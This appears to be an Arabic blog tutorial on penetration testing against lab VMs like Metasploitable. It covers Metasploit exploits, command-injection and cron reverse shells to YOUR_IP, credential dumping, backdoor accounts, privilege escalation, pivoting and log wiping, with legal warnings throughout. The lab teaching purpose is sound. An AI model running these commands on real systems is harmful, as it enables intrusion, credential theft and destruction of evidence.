القائمة
الرئيسية مقالات {{t.nav.bookmarks}} {{t.nav.experience}} {{t.nav.profiles}} نبذة عني اعمل معي
Cybersecurity concept visualization
أمان مارس 8, 2026 • 28 دقائق للقراءة

Exploitation: From Vulnerability to Shell

Master Metasploit Framework, exploit real vulnerabilities, escalate privileges, and pivot through networks. The complete guide to ethical exploitation techniques.

شارك:
Lee Foropoulos

Lee Foropoulos

28 دقائق للقراءة

Continue where you left off?
Text size:

Contents

مسار الهاكر: سلسلة من 5 أجزاء

الجزء 1: المقدمةالجزء 2: إتقان Flipperالجزء 3: أساسيات Kaliالجزء 4: الاستغلالالجزء 5: التدقيق الكامل

في الأجزاء 1-3، بنيت مجموعة أدواتك. يمكنك استنساخ البطاقات، ورسم خرائط الشبكات، والتقاط المصافحات، وتحديد كل خدمة تعمل على الهدف. الآن ترى الثغرات في كل مكان. لكن رؤية الثغرة واستغلالها مهارتان مختلفتان تماماً.

هنا تصبح الأمور جدية. اليوم ستتعلم استخدام Metasploit Framework، نفس الأداة التي يستخدمها مختبرو الاختراق المحترفون حول العالم. ستستغل ثغرتك الأولى، وتؤسس الثبات، وتصعد الصلاحيات، وتتعلم التحول عبر الشبكة.

الخط الذي لا يجب تجاوزه

كل شيء في هذه المقالة يجب ممارسته على أنظمة تملكها أو لديك إذن كتابي صريح لاختبارها. الوصول غير المصرح به إلى أنظمة الكمبيوتر جريمة فيدرالية تحمل عقوبات تصل إلى 20 عاماً سجن. "كنت أتعلم فقط" ليس دفاعاً صالحاً. أنشئ مختبراً، استخدم أجهزة افتراضية ضعيفة عمداً، ولا تلمس أبداً أنظمة لا تملكها.

الجزء 1: بناء مختبر الهجوم

قبل استغلال أي شيء، تحتاج أهدافاً. مختبرو الاختراق الحقيقيون يستخدمون بيئات مختبرية معزولة مع أجهزة ضعيفة عمداً. ستفعل نفس الشيء.

الإعداد الأساسي للمختبر

ما ستحتاج إليه

  • Kali Linux VM - جهاز الهجوم الخاص بك (من الجزء 3)
  • Metasploitable 2 - جهاز Linux افتراضي ضعيف عمداً (SourceForge)
  • Metasploitable 3 - جهاز Windows/Linux افتراضي ضعيف (GitHub)
  • DVWA - Damn Vulnerable Web Application (GitHub)
  • VulnHub VMs - أجهزة ضعيفة بنمط CTF (vulnhub.com)

مشروع: إعداد شبكة المختبر

الوقت: 45 دقيقة

  1. حمّل Metasploitable 2 من SourceForge
  2. استورده في VirtualBox/VMware
  3. اضبط الشبكة: اجعل كلاً من Kali وMetasploitable على "Host-Only" أو "Internal Network"
  4. شغّل Metasploitable (تسجيل الدخول الافتراضي: msfadmin / msfadmin)
  5. سجّل عنوان IP: ifconfig
  6. من Kali، تحقق من الاتصال: ping METASPLOITABLE_IP
  7. نفّذ الفحص الأولي: sudo nmap -sV -sC METASPLOITABLE_IP

التحقق: يجب أن ترى عشرات المنافذ المفتوحة. Metasploitable مصمم ليتم اختراقه.

فحص nmap لـ Metasploitable يجب أن يكشف خدمات مثل FTP وSSH وTelnet وSMTP وHTTP وSamba وMySQL وPostgreSQL وغيرها، كثير منها يشغل إصدارات قديمة وضعيفة. هذا هو ملعبك.

الجزء 2: أساسيات Metasploit Framework

Metasploit ليس مجرد أداة. إنه نظام بيئي كامل. يحتوي على آلاف الاستغلالات، والحمولات، والوحدات المساعدة، وأدوات ما بعد الاستغلال. فهم بنيته أمر ضروري.

4,000+
وحدة استغلال متاحة في Metasploit Framework، تغطي كل منصة رئيسية وفئة ثغرات.

تشغيل Metasploit

bash
1# Initialize the database (first time only)
2sudo msfdb init
3
4# Start Metasploit console
5msfconsole
6
7# You'll see the Metasploit banner and prompt:
8msf6 >

بنية Metasploit

ينظم Metasploit كل شيء في وحدات:

  • Exploits - كود يستغل الثغرات
  • Payloads - كود يعمل بعد الاستغلال (shells، meterpreter)
  • Auxiliary - ماسحات، وfuzzers، وأدوات مساعدة أخرى
  • Post - وحدات ما بعد الاستغلال للثبات والتحول
  • Encoders - تشويش الحمولات لتجنب الكشف
bash
1# Search for modules
2msf6 > search type:exploit platform:linux smb
3
4# Search by CVE
5msf6 > search cve:2017-0144
6
7# Search by name
8msf6 > search vsftpd
9
10# Get info about a module
11msf6 > info exploit/unix/ftp/vsftpd_234_backdoor

سير عمل الاستغلال

كل استغلال في Metasploit يتبع نفس النمط:

  1. اختر استغلالاً - use exploit/path/to/module
  2. اضبط الخيارات - عنوان IP الهدف، المنافذ، بيانات الاعتماد
  3. اختر حمولة - ما يعمل بعد الاستغلال
  4. نفّذ - exploit أو run
Cybersecurity operations with code on multiple screens
يوفر Metasploit Framework نهجاً منظماً للاستغلال، محولاً أبحاث الثغرات إلى سير عمل مهني قابل للتكرار.

الجزء 3: استغلالك الأول

لنستغل واحدة من أشهر الأبواب الخلفية في التاريخ: باب vsftpd 2.3.4 الخلفي. في عام 2011، أدخل شخص ما باباً خلفياً في الكود المصدري لـ vsftpd. إذا أرسلت اسم مستخدم ينتهي بـ :)، يفتح shell على المنفذ 6200.

Metasploitable 2 يشغل بالضبط هذا الإصدار.

bash
1# Start Metasploit
2msfconsole
3
4# Search for the exploit
5msf6 > search vsftpd
6
7# Select the exploit
8msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
9
10# View required options
11msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options
12
13# Set the target
14msf6 exploit(...) > set RHOSTS 192.168.56.101
15
16# Run the exploit
17msf6 exploit(...) > exploit
18
19# If successful:
20[*] Command shell session 1 opened
21[+] Got shell!
22
23# You now have a root shell on the target
24whoami
25root
26id
27uid=0(root) gid=0(root)

هذا كل شيء. خدمة واحدة ضعيفة، استغلال واحد، وصول root. لهذا السبب تحديث البرامج مهم.

خدمة واحدة ضعيفة، استغلال واحد، وصول root. لهذا السبب تحديث البرامج مهم.

مشروع: استغلال باب vsftpd الخلفي

الوقت: 15 دقيقة

المتطلبات المسبقة: Metasploitable 2 يعمل، Kali على نفس الشبكة

  1. تحقق من عمل FTP: nmap -sV -p 21 TARGET_IP
  2. شغّل msfconsole
  3. ابحث واختر واضبط استغلال vsftpd
  4. نفّذ الاستغلال
  5. بعد الحصول على shell، استكشف: cat /etc/shadow

معايير النجاح: يمكنك قراءة /etc/shadow، الذي يمكن لـ root فقط الوصول إليه.

الجزء 4: فهم الحمولات

الحمولة هي ما يعمل بعد نجاح الاستغلال. الـ shell الأساسي الذي حصلنا عليه أعلاه بسيط، لكن Metasploit يقدم خيارات أقوى بكثير.

أنواع الحمولات

  • Singles - حمولات مستقلة، لاستخدام واحد (إضافة مستخدم، تنفيذ أمر)
  • Stagers - حمولات صغيرة تنشئ اتصالاً، ثم تحمّل الحمولة الرئيسية
  • Stages - الحمولة الرئيسية التي يحمّلها الـ stager (مثل Meterpreter)
bash
1# List compatible payloads for current exploit
2msf6 exploit(...) > show payloads
3
4# Set a specific payload
5msf6 exploit(...) > set PAYLOAD linux/x86/meterpreter/reverse_tcp
6
7# Payload naming convention:
8# platform/arch/payload_type/connection_type
9# linux/x86/meterpreter/reverse_tcp
10# windows/x64/shell/bind_tcp

Reverse مقابل Bind Shells

  • Reverse shell - الهدف يتصل عائداً إليك. أفضل لتجاوز جدران الحماية (الاتصال الصادر عادة مسموح).
  • Bind shell - الهدف يفتح منفذاً لتتصل به. أسهل في الكشف، وغالباً يحظره جدار الحماية.
bash
1# For reverse shells, you must set your IP
2msf6 exploit(...) > set LHOST YOUR_KALI_IP
3msf6 exploit(...) > set LPORT 4444
4
5# Metasploit starts a listener automatically when you exploit

Meterpreter: الحمولة المطلقة

Meterpreter هو أقوى حمولة في Metasploit. يعمل بالكامل في الذاكرة (بدون ملفات على القرص)، يوفر اتصالاً مشفراً، ويتضمن عشرات الأوامر المدمجة لما بعد الاستغلال.

bash
1# Meterpreter commands (once you have a session)
2meterpreter > sysinfo          # System information
3meterpreter > getuid           # Current user
4meterpreter > pwd              # Current directory
5meterpreter > ls               # List files
6meterpreter > download file    # Download file to Kali
7meterpreter > upload file      # Upload file to target
8meterpreter > shell            # Drop to system shell
9meterpreter > hashdump         # Dump password hashes
10meterpreter > screenshot       # Take screenshot
11meterpreter > keyscan_start    # Start keylogger
12meterpreter > keyscan_dump     # Dump keystrokes
13meterpreter > background       # Background this session

الجزء 5: تقنيات استغلال إضافية

استغلال Samba (SMB)

Metasploitable 2 يشغل إصداراً ضعيفاً من Samba. هذا مشابه لاستغلال EternalBlue الشهير المستخدم في WannaCry.

bash
1# Search for Samba exploits
2msf6 > search type:exploit samba
3
4# The "username map script" vulnerability
5msf6 > use exploit/multi/samba/usermap_script
6msf6 exploit(...) > set RHOSTS TARGET_IP
7msf6 exploit(...) > set PAYLOAD cmd/unix/reverse
8msf6 exploit(...) > set LHOST YOUR_IP
9msf6 exploit(...) > exploit
10
11[*] Command shell session 2 opened

استغلال بيانات الاعتماد الضعيفة

لا يتطلب كل اختراق ثغرة برمجية. كلمات المرور الضعيفة موجودة في كل مكان.

bash
1# SSH brute-force auxiliary module
2msf6 > use auxiliary/scanner/ssh/ssh_login
3msf6 auxiliary(...) > set RHOSTS TARGET_IP
4msf6 auxiliary(...) > set USERNAME root
5msf6 auxiliary(...) > set PASS_FILE /usr/share/wordlists/rockyou.txt
6msf6 auxiliary(...) > set STOP_ON_SUCCESS true
7msf6 auxiliary(...) > run
8
9# For known credentials
10msf6 > use auxiliary/scanner/ssh/ssh_login
11msf6 auxiliary(...) > set USERNAME msfadmin
12msf6 auxiliary(...) > set PASSWORD msfadmin
13msf6 auxiliary(...) > run
14
15[+] 192.168.56.101:22 - Success: 'msfadmin:msfadmin'

استغلال تطبيقات الويب

يتضمن Metasploitable عدة تطبيقات ويب ضعيفة. لنستغل حقن كود PHP.

bash
1# First, browse to http://TARGET/mutillidae/
2# Find the "User Lookup" page (vulnerable to SQLi and code injection)
3
4# Use Metasploit's web exploits
5msf6 > search type:exploit php
6
7# Or exploit manually with command injection:
8# In vulnerable input field:
9; cat /etc/passwd
10; nc -e /bin/bash YOUR_IP 4444

مشروع: استغلال ثلاث خدمات مختلفة

الوقت: 60 دقيقة

الهدف: Metasploitable 2

  1. استغل باب vsftpd الخلفي (FTP - منفذ 21) واحصل على root shell
  2. استغل Samba usermap_script (SMB - منفذ 139/445) واحصل على root shell
  3. اكسر بيانات اعتماد SSH (منفذ 22) باستخدام auxiliary/scanner/ssh/ssh_login
  4. وثّق كل استغلال: الوحدة المستخدمة، الخيارات المضبوطة، النتيجة

إضافي: استكشف تطبيقات الويب على المنفذ 80 وابحث عن نواقل استغلال يدوية.

الجزء 6: ما بعد الاستغلال

الحصول على shell هو البداية فقط. اختبارات الاختراق الحقيقية تتطلب إثبات ما يمكن للمهاجم فعله بهذا الوصول. هذا هو ما بعد الاستغلال.

جمع المعلومات

text
1# From a Meterpreter session
2meterpreter > sysinfo
3Computer    : metasploitable
4OS          : Linux 2.6.24
5Architecture: i686
6Meterpreter : x86/linux
7
8# Network information
9meterpreter > ipconfig
10meterpreter > route
11meterpreter > arp
bash
1# From a regular shell
2cat /etc/passwd       # All users
3cat /etc/shadow       # Password hashes (requires root)
4cat /etc/hosts        # Network mappings
5netstat -tulpn        # Open ports
6ps aux                # Running processes
7crontab -l            # Scheduled tasks

حصاد بيانات الاعتماد

text
1# Dump password hashes
2meterpreter > hashdump
3root:$1$XtqVHIvN$0MnR7..........:0:0:root:/root:/bin/bash
4msfadmin:$1$XN10Zj2c$Rt/zzC........:1000:1000::/home/msfadmin:/bin/bash
bash
1# Or from shell
2cat /etc/shadow
3
4# Crack hashes offline with John the Ripper
5john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
6
7# Or hashcat (faster with GPU)
8hashcat -m 500 hashes.txt /usr/share/wordlists/rockyou.txt

تأسيس الثبات

الثبات يعني الحفاظ على الوصول حتى بعد إعادة التشغيل أو عندما يتم إصلاح ناقل الاستغلال الأولي.

bash
1# Add a new user with sudo access
2useradd -m -s /bin/bash hacker
3echo "hacker:password123" | chpasswd
4usermod -aG sudo hacker
5
6# Add SSH key for passwordless access
7mkdir /home/hacker/.ssh
8echo "YOUR_PUBLIC_KEY" >> /home/hacker/.ssh/authorized_keys
9
10# Cron-based reverse shell (reconnects every minute)
11echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'" >> /var/spool/cron/crontabs/root
12
13# Metasploit persistence module
14meterpreter > run persistence -h
15meterpreter > run persistence -X -i 60 -p 4444 -r YOUR_IP

الثبات = أدلة

كل آلية ثبات تترك آثاراً. في اختبار اختراق حقيقي، توثق ما يمكنك فعله ثم تنظف. ترك أبواب خلفية على أنظمة العملاء أمر غير مهني وقد يكون غير قانوني. في مختبرك، جرب ما تشاء، لكن افهم العواقب.

الجزء 7: تصعيد الصلاحيات

غالباً تحصل على وصول أولي كمستخدم بصلاحيات منخفضة. التصعيد إلى root/admin مطلوب عادة لتحقيق أهداف الاختبار.

تصعيد الصلاحيات في Linux

bash
1# Current user context
2id
3whoami
4
5# SUID binaries (run as owner regardless of who executes)
6find / -perm -4000 -type f 2>/dev/null
7
8# World-writable directories
9find / -writable -type d 2>/dev/null
10
11# Sudo permissions
12sudo -l
13
14# Kernel version (for kernel exploits)
15uname -a
16
17# Running processes as root
18ps aux | grep root
19
20# Cron jobs
21cat /etc/crontab
22ls -la /etc/cron.*

سكربتات التعداد الآلية

bash
1# Upload and run LinPEAS
2# From Kali, host the script:
3python3 -m http.server 8000
4
5# From target:
6wget http://YOUR_IP:8000/linpeas.sh
7chmod +x linpeas.sh
8./linpeas.sh
9
10# LinPEAS highlights potential vectors in colors:
11# RED/YELLOW = Critical findings, likely exploitable

نواقل Privesc الشائعة في Linux

bash
1# 1. Sudo misconfiguration
2sudo -l
3# If you see: (ALL) NOPASSWD: /usr/bin/vim
4sudo vim -c '!sh'
5# Instant root shell
6
7# 2. SUID binary exploitation
8# If /usr/bin/find has SUID bit:
9find . -exec /bin/sh -p \;
10
11# 3. Writable /etc/passwd
12# Generate password hash:
13openssl passwd -1 mypassword
14# Add to /etc/passwd:
15echo 'hacker:$1$xyz$...:0:0:root:/root:/bin/bash' >> /etc/passwd
16
17# 4. Cron job exploitation
18# If a cron runs a writable script as root:
19echo 'chmod +s /bin/bash' >> /path/to/cron/script
20# Wait for cron, then:
21/bin/bash -p
22# Root shell

تصعيد الصلاحيات في Windows

إذا كنت تختبر أهداف Windows (Metasploitable 3)، التقنيات تختلف:

text
1# From Meterpreter on Windows
2meterpreter > getuid
3Server username: VICTIM\lowpriv_user
4
5meterpreter > getsystem
6[+] ...got SYSTEM
7
8# If getsystem fails, try:
9meterpreter > run post/multi/recon/local_exploit_suggester
10
11# Or background and use specific exploit:
12meterpreter > background
13msf6 > use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
14msf6 exploit(...) > set SESSION 1
15msf6 exploit(...) > exploit

مشروع: التصعيد من مستخدم إلى Root

الوقت: 45 دقيقة

السيناريو: لديك وصول SSH إلى Metasploitable كـ msfadmin (ليس root)

  1. SSH إلى Metasploitable: ssh msfadmin@TARGET
  2. نفّذ id لتأكيد أنك لست root
  3. تحقق من صلاحيات sudo: sudo -l
  4. ابحث عن ملفات SUID: find / -perm -4000 2>/dev/null
  5. ارفع ونفّذ LinPEAS
  6. حدد ناقل privesc واستغله

الهدف: الحصول على root shell باستخدام شيء غير استغلال خدمة شبكية.

Hacker working on code in a dark environment
تصعيد الصلاحيات يحول الوصول المحدود إلى تحكم كامل بالنظام، غالباً من خلال أخطاء تكوين تم تجاهلها وليس من خلال استغلالات متطورة.

الجزء 8: التحول (Pivoting)

التحول هو استخدام نظام مخترق لمهاجمة أنظمة أخرى لا يمكن الوصول إليها مباشرة من جهاز الهجوم الخاص بك. هكذا يتحرك المهاجمون أفقياً عبر الشبكات.

سيناريو التحول

تخيل هذه الشبكة:

  • جهاز Kali الخاص بك: 192.168.1.100
  • المضيف المخترق: 192.168.1.50 (متصل أيضاً بالشبكة الداخلية 10.0.0.0/24)
  • الهدف: 10.0.0.10 (يمكن الوصول إليه فقط من 192.168.1.50)

لا يمكنك الوصول إلى 10.0.0.10 مباشرة. لكن من خلال المضيف المخترق، يمكنك ذلك.

توجيه Metasploit

text
1# After getting a Meterpreter session on the pivot host
2meterpreter > ipconfig
3# Shows two interfaces: 192.168.1.50 and 10.0.0.50
4
5meterpreter > run autoroute -s 10.0.0.0/24
6[+] Added route to 10.0.0.0/24 via session 1
7
8meterpreter > background
9
10# Now Metasploit routes 10.0.0.0/24 traffic through session 1
11msf6 > route print
12
13# Scan the internal network
14msf6 > use auxiliary/scanner/portscan/tcp
15msf6 auxiliary(...) > set RHOSTS 10.0.0.1-254
16msf6 auxiliary(...) > set PORTS 22,80,443,445
17msf6 auxiliary(...) > run
18
19# Exploit internal targets through the pivot
20msf6 > use exploit/windows/smb/ms17_010_eternalblue
21msf6 exploit(...) > set RHOSTS 10.0.0.10
22msf6 exploit(...) > exploit

SOCKS Proxy للوصول الكامل

bash
1# Set up a SOCKS proxy through Meterpreter
2msf6 > use auxiliary/server/socks_proxy
3msf6 auxiliary(...) > set SRVPORT 1080
4msf6 auxiliary(...) > run
5
6# Configure proxychains (/etc/proxychains4.conf)
7socks5 127.0.0.1 1080
8
9# Now any tool can access the internal network
10proxychains nmap -sT -Pn 10.0.0.10
11proxychains curl http://10.0.0.10
12proxychains ssh [email protected]

نفق SSH (بدون Metasploit)

bash
1# Dynamic port forwarding (SOCKS proxy)
2ssh -D 1080 user@pivot_host
3
4# Local port forwarding (specific port)
5ssh -L 8080:10.0.0.10:80 user@pivot_host
6# Now localhost:8080 reaches 10.0.0.10:80
7
8# Remote port forwarding (expose your service to internal network)
9ssh -R 4444:localhost:4444 user@pivot_host
10# Internal hosts can reach your port 4444 via pivot_host:4444

الجزء 9: إخفاء الآثار

مختبرو الاختراق المحترفون يوثقون وصولهم لكنهم ينظفون بعد ذلك. فهم كيف يخفي المهاجمون آثارهم يساعد أيضاً في اكتشاف الاختراقات.

bash
1# Clear bash history
2history -c
3cat /dev/null > ~/.bash_history
4
5# Clear auth logs (requires root)
6echo "" > /var/log/auth.log
7echo "" > /var/log/wtmp
8echo "" > /var/log/btmp
9
10# Remove specific log entries
11sed -i '/YOUR_IP/d' /var/log/auth.log
12
13# Timestomp (change file timestamps)
14touch -r /etc/passwd /path/to/your/file
15
16# Meterpreter
17meterpreter > clearev          # Clear Windows event logs
18meterpreter > timestomp file -m "01/01/2020 12:00:00"

في المهام الحقيقية: لا تفعل هذا

مختبرو الاختراق المحترفون يوثقون وصولهم ويبلغون عن نتائجهم. لا يخفونها. مسح السجلات يدمر الأدلة التي يحتاجها المدافعون لفهم مسار الهجوم. مارس هذه التقنيات فقط في بيئة مختبرك المعزولة.

مسار الهاكر

سلسلة من 5 أجزاء تأخذك من فضولي إلى قادر.

الجزء 1: المقدمة الجزء 2: إتقان Flipper الجزء 3: أساسيات Kali الجزء 4: الاستغلال ✓ الجزء 5: التدقيق الكامل

قائمة مراجعة الجزء 4

☐ إعداد المختبر: Metasploitable 2 يعمل، شبكة معزولة مُعدة

☐ Metasploit: قاعدة البيانات مُهيأة، التنقل الأساسي مُتقن

☐ أول استغلال: باب vsftpd الخلفي مُستغل، root shell تم الحصول عليه

☐ نواقل متعددة: FTP وSMB مُستغلان وبيانات SSH مكسورة

☐ ما بعد الاستغلال: تجزئات كلمات المرور مُستخرجة، النظام مُعدد

☐ تصعيد الصلاحيات: تصعيد من مستخدم إلى root بدون استغلال شبكي

☐ التحول: فهم مفاهيم autoroute وSOCKS proxy

☐ التوثيق: جميع الاستغلالات موثقة بالخطوات والأدلة

خطة عمل مهارات الاستغلال 0/5

ما التالي

تعلمت استغلال الثغرات، وتصعيد الصلاحيات، والتحول عبر الشبكات. رأيت كيف يتحول ضعف واحد بسرعة إلى اختراق كامل. أنت تفهم ما يفعله مختبرو الاختراق المحترفون.

في الجزء 5، نجمع كل شيء معاً. ستجري تدقيقاً أمنياً كاملاً من البداية إلى النهاية:

  • تحديد النطاق وقواعد المشاركة
  • منهجية استطلاع كاملة
  • استغلال منهجي
  • ما بعد استغلال شامل
  • تقارير مهنية
  • توصيات المعالجة

الجزء 5 هو التتويج. كل ما تعلمته عبر هذه السلسلة يتحد في منهجية واقعية يمكنك استخدامها لتقييم أمان أي شبكة مصرح لك باختبارها.

تعلمت التقنيات. الآن تتعلم المنهجية. الجزء 5 يحول المهارات إلى سير عمل كامل لاختبار الاختراق.

نراك في الجزء 5.

How was this article?

شارك

Link copied to clipboard!

You Might Also Like

Lee Foropoulos

Lee Foropoulos

Business Development Lead at Lookatmedia, fractional executive, and founder of gotHABITS.

🔔

La tufawwit ay maqal

Ihsal ala isharat inda nashr maqalat jadida. La yulzam barid iliktiruni.

Satara laafita fil mawqi inda wujud maqal jadid, wa ishaar min almutasaffih idha samahta.

Isharat almutasaffih faqat. Bidun rasail muzaaja.

0 / 0